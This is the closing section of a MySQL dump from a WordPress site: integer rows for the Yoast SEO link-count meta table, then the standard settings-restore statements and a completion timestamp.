LOCK TABLES `wp_yoast_seo_meta` WRITE;
/*!40000 ALTER TABLE `wp_yoast_seo_meta` DISABLE KEYS */;
INSERT INTO `wp_yoast_seo_meta` VALUES (5,0,1),(10,7,0),(14,0,1),(20,0,0),(21,0,0),(26,0,0),(27,0,0),(28,0,0),(32,9,0),(36,1,0),(42,0,0),(46,0,0),(47,0,1),(49,0,1),(51,0,1),(54,0,1),(69,0,0),(71,0,0),(73,0,0),(75,0,0),(77,0,0),(79,0,0),(81,0,0),(83,0,0),(85,0,0),(87,0,0),(89,0,0),(91,0,0),(94,0,0),(95,0,0),(96,0,0),(98,0,0),(99,0,0),(100,0,0),(102,0,0),(104,0,0),(106,0,0),(108,0,1),(114,0,0),(116,0,0),(141,12,0),(207,0,0),(211,0,0),(213,0,0),(216,0,0),(220,0,0),(244,0,0),(288,0,0),(290,0,0),(322,0,0),(323,0,0),(324,0,0),(325,0,0),(327,0,0),(328,0,0),(329,0,0),(331,0,0),(333,0,0),(334,0,0),(337,0,0),(339,0,0),(398,0,0),(399,0,0),(400,0,0),(401,0,0),(402,0,0),(435,0,0),(472,0,0),(474,0,0),(475,0,0),(476,4,0),(481,0,0),(482,0,0),(483,0,0),(484,0,0),(485,0,0),(506,0,0),(522,0,0),(524,0,0),(528,0,0),(529,0,0),(530,0,0),(547,0,0),(548,0,0),(574,0,0),(587,0,0),(590,0,0),(603,0,0),(618,0,0),(619,0,0),(620,0,0),(630,0,0),(631,0,0),(633,0,0),(654,0,0),(685,0,0),(692,0,0),(703,0,0),(706,0,0),(711,0,0),(712,0,0),(715,0,0),(717,0,0),(726,0,0),(727,0,0),(742,0,0),(757,0,0),(774,0,0),(779,0,0),(783,0,0),(784,0,0),(785,0,0),(800,0,0),(840,0,0),(842,0,0),(843,0,0),(844,0,0),(845,0,0),(846,0,0),(847,0,0),(848,0,0),(849,0,0),(850,0,0),(851,0,0),(852,0,0),(853,0,0),(854,0,0),(855,0,0),(856,0,0),(874,0,0),(875,0,0),(898,0,0),(902,0,0),(908,0,0),(909,0,0),(937,0,0),(938,0,0),(939,0,0),(940,0,0),(941,0,0),(942,0,0),(943,0,0),(964,0,0),(965,0,0),(977,0,0),(979,0,0),(980,0,0),(1001,0,0),(1002,0,0),(1003,0,0),(1005,0,0),(1009,0,0),(1015,0,0),(1041,0,0),(1049,0,0);
/*!40000 ALTER TABLE `wp_yoast_seo_meta` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2021-04-26 10:36:51
